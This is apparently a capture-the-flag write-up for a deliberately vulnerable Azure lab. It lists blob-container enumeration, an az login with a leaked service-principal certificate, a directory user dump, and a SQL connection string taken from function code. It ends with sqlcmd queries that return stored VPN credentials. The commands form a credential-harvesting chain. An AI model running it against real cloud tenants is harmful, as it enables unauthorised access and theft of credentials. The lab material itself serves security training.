Challenge 1:
Enumerate and find https://supercompanystorage.blob.core.windows.net/storagecontainer using ?restype=container&comp=list and download the pem and ovpn file(not needed yet)

Challenge 2:
In the pem file we can find app id and tenant id. Able to login with these details.
az login --service-principal -u b2bfb506-aead-40d8-9e93-6f3e5d752826 -p cert.pem --tenant 4452edfd-a89d-43aa-8b46-a314c219cc50 --allow-no-subscriptions


az ad user list output:

[
  {
    "accountEnabled": true,
    "ageGroup": null,
    "assignedLicenses": [],
    "assignedPlans": [],
    "city": null,
    "companyName": null,
    "consentProvidedForMinor": null,
    "country": null,
    "createdDateTime": "2022-08-08T11:07:38Z",
    "creationType": null,
    "deletionTimestamp": null,
    "department": null,
    "dirSyncEnabled": null,
    "displayName": "DevOps",
    "employeeId": null,
    "facsimileTelephoneNumber": null,
    "givenName": null,
    "immutableId": null,
    "isCompromised": null,
    "jobTitle": null,
    "lastDirSyncTime": null,
    "legalAgeGroupClassification": null,
    "mail": null,
    "mailNickname": "devops",
    "mobile": null,
    "objectId": "fd871932-d592-4791-989b-53dd81f8c9e5",
    "objectType": "User",
    "odata.type": "Microsoft.DirectoryServices.User",
    "onPremisesDistinguishedName": null,
    "onPremisesSecurityIdentifier": null,
    "otherMails": [],
    "passwordPolicies": "DisablePasswordExpiration, DisableStrongPassword",
    "passwordProfile": null,
    "physicalDeliveryOfficeName": "Password temp changed to SECURA{D4F4ULT_P4SSW0RD}",
    "postalCode": null,
    "preferredLanguage": null,
    "provisionedPlans": [],
    "provisioningErrors": [],
    "proxyAddresses": [],
    "refreshTokensValidFromDateTime": "2022-08-08T11:07:38Z",
    "showInAddressList": true,
    "signInNames": [],
    "sipProxyAddress": null,
    "state": null,
    "streetAddress": null,
    "surname": null,
    "telephoneNumber": null,
    "thumbnailPhoto@odata.mediaEditLink": "directoryObjects/fd871932-d592-4791-989b-53dd81f8c9e5/Microsoft.DirectoryServices.User/thumbnailPhoto",
    "usageLocation": null,
    "userIdentities": [],
    "userPrincipalName": "devops@secvulnapp.onmicrosoft.com",
    "userState": null,
    "userStateChangedOn": null,
    "userType": "Member"
  },
  {
    "accountEnabled": true,
    "ageGroup": null,
    "assignedLicenses": [],
    "assignedPlans": [],
    "city": null,
    "companyName": null,
    "consentProvidedForMinor": null,
    "country": null,
    "createdDateTime": "2022-02-28T15:05:07Z",
    "creationType": null,
    "deletionTimestamp": null,
    "department": null,
    "dirSyncEnabled": null,
    "displayName": "roy.stultiens@azuredevsecura.onmicrosoft.com Stultiens",
    "employeeId": null,
    "facsimileTelephoneNumber": null,
    "givenName": "roy.stultiens@azuredevsecura.onmicrosoft.com",
    "immutableId": null,
    "isCompromised": null,
    "jobTitle": null,
    "lastDirSyncTime": null,
    "legalAgeGroupClassification": null,
    "mail": null,
    "mailNickname": "roy.stultiens_azuredevsecura.onmicrosoft.com#EXT#",
    "mobile": null,
    "objectId": "c76d2c74-8bee-4d73-8e81-a24549bafe85",
    "objectType": "User",
    "odata.type": "Microsoft.DirectoryServices.User",
    "onPremisesDistinguishedName": null,
    "onPremisesSecurityIdentifier": null,
    "otherMails": [
      "roy.stultiens@azuredevsecura.onmicrosoft.com"
    ],
    "passwordPolicies": null,
    "passwordProfile": null,
    "physicalDeliveryOfficeName": null,
    "postalCode": null,
    "preferredLanguage": null,
    "provisionedPlans": [],
    "provisioningErrors": [],
    "proxyAddresses": [],
    "refreshTokensValidFromDateTime": "2022-02-28T15:05:07Z",
    "showInAddressList": null,
    "signInNames": [],
    "sipProxyAddress": null,
    "state": null,
    "streetAddress": null,
    "surname": "Stultiens",
    "telephoneNumber": null,
    "thumbnailPhoto@odata.mediaEditLink": "directoryObjects/c76d2c74-8bee-4d73-8e81-a24549bafe85/Microsoft.DirectoryServices.User/thumbnailPhoto",
    "usageLocation": null,
    "userIdentities": [],
    "userPrincipalName": "roy.stultiens_azuredevsecura.onmicrosoft.com#EXT#@secvulnapp.onmicrosoft.com",
    "userState": null,
    "userStateChangedOn": null,
    "userType": "Member"
  },
  {
    "accountEnabled": true,
    "ageGroup": null,
    "assignedLicenses": [],
    "assignedPlans": [],
    "city": null,
    "companyName": null,
    "consentProvidedForMinor": null,
    "country": null,
    "createdDateTime": "2022-03-22T10:50:19Z",
    "creationType": null,
    "deletionTimestamp": null,
    "department": null,
    "dirSyncEnabled": null,
    "displayName": "Roy Stultiens",
    "employeeId": null,
    "facsimileTelephoneNumber": null,
    "givenName": null,
    "immutableId": null,
    "isCompromised": null,
    "jobTitle": null,
    "lastDirSyncTime": null,
    "legalAgeGroupClassification": null,
    "mail": null,
    "mailNickname": "roy",
    "mobile": null,
    "objectId": "41cfff23-c2c2-49c2-a8a9-abc0642dc8c5",
    "objectType": "User",
    "odata.type": "Microsoft.DirectoryServices.User",
    "onPremisesDistinguishedName": null,
    "onPremisesSecurityIdentifier": null,
    "otherMails": [],
    "passwordPolicies": null,
    "passwordProfile": null,
    "physicalDeliveryOfficeName": null,
    "postalCode": null,
    "preferredLanguage": null,
    "provisionedPlans": [],
    "provisioningErrors": [],
    "proxyAddresses": [],
    "refreshTokensValidFromDateTime": "2022-07-27T11:31:46Z",
    "showInAddressList": null,
    "signInNames": [],
    "sipProxyAddress": null,
    "state": null,
    "streetAddress": null,
    "surname": null,
    "telephoneNumber": null,
    "thumbnailPhoto@odata.mediaEditLink": "directoryObjects/41cfff23-c2c2-49c2-a8a9-abc0642dc8c5/Microsoft.DirectoryServices.User/thumbnailPhoto",
    "usageLocation": null,
    "userIdentities": [],
    "userPrincipalName": "roy@secvulnapp.onmicrosoft.com",
    "userState": null,
    "userStateChangedOn": null,
    "userType": "Member"
  },
  {
    "accountEnabled": true,
    "ageGroup": null,
    "assignedLicenses": [],
    "assignedPlans": [],
    "city": null,
    "companyName": null,
    "consentProvidedForMinor": null,
    "country": null,
    "createdDateTime": "2022-02-28T15:08:59Z",
    "creationType": null,
    "deletionTimestamp": null,
    "department": null,
    "dirSyncEnabled": null,
    "displayName": "Siebren",
    "employeeId": null,
    "facsimileTelephoneNumber": null,
    "givenName": null,
    "immutableId": null,
    "isCompromised": null,
    "jobTitle": null,
    "lastDirSyncTime": null,
    "legalAgeGroupClassification": null,
    "mail": null,
    "mailNickname": "siebren",
    "mobile": null,
    "objectId": "16998a3a-15cf-4970-b86a-29922e2559df",
    "objectType": "User",
    "odata.type": "Microsoft.DirectoryServices.User",
    "onPremisesDistinguishedName": null,
    "onPremisesSecurityIdentifier": null,
    "otherMails": [],
    "passwordPolicies": null,
    "passwordProfile": null,
    "physicalDeliveryOfficeName": null,
    "postalCode": null,
    "preferredLanguage": null,
    "provisionedPlans": [],
    "provisioningErrors": [],
    "proxyAddresses": [],
    "refreshTokensValidFromDateTime": "2022-03-10T10:59:38Z",
    "showInAddressList": null,
    "signInNames": [],
    "sipProxyAddress": null,
    "state": null,
    "streetAddress": null,
    "surname": null,
    "telephoneNumber": null,
    "thumbnailPhoto@odata.mediaEditLink": "directoryObjects/16998a3a-15cf-4970-b86a-29922e2559df/Microsoft.DirectoryServices.User/thumbnailPhoto",
    "usageLocation": null,
    "userIdentities": [],
    "userPrincipalName": "siebren@secvulnapp.onmicrosoft.com",
    "userState": null,
    "userStateChangedOn": null,
    "userType": "Member"
  }
]

Challenge 3:
We manage to find a few user emails
- siebren@secvulnapp.onmicrosoft.com
- roy@secvulnapp.onmicrosoft.com
- roy.stultiens_azuredevsecura.onmicrosoft.com#EXT#@secvulnapp.onmicrosoft.com / roy.stultiens@azuredevsecura.onmicrosoft.com
- devops@secvulnapp.onmicrosoft.com : SECURA{D4F4ULT_P4SSW0RD}

Logging into azure portal we find we have access to a function app. Inspecting the code gives us the password for sql connection.    
return new OkObjectResult("Server=tcp:securavulnerableserver.database.windows.net,1433;Initial Catalog=securavulnerabledb;Persist Security Info=False;User ID=DevOps;Password=SECURA{C0NN3CT10N_STR1NG};MultipleActiveResultSets=False;Encrypt=True;TrustServerCertificate=False;Connection Timeout=30;");


Challenge 4:
You can connect to the database using the connection string.
The command you can use to connect is sqlcmd -S securavulnerableserver.database.windows.net -d securavulnerabledb -U DevOps -P SECURA{C0NN3CT10N_STR1NG}.

SELECT * FROM information_schema.tables;
go
SELECT * FROM vpn_employee_data. 

 vpn_username Employee23187 
 vpn_password SECURA{VPN_CR3D3NT14LS}.

https://www.brokenazure.cloud/drm0s7q6nhhvxk8e57yqvhd814/index.html





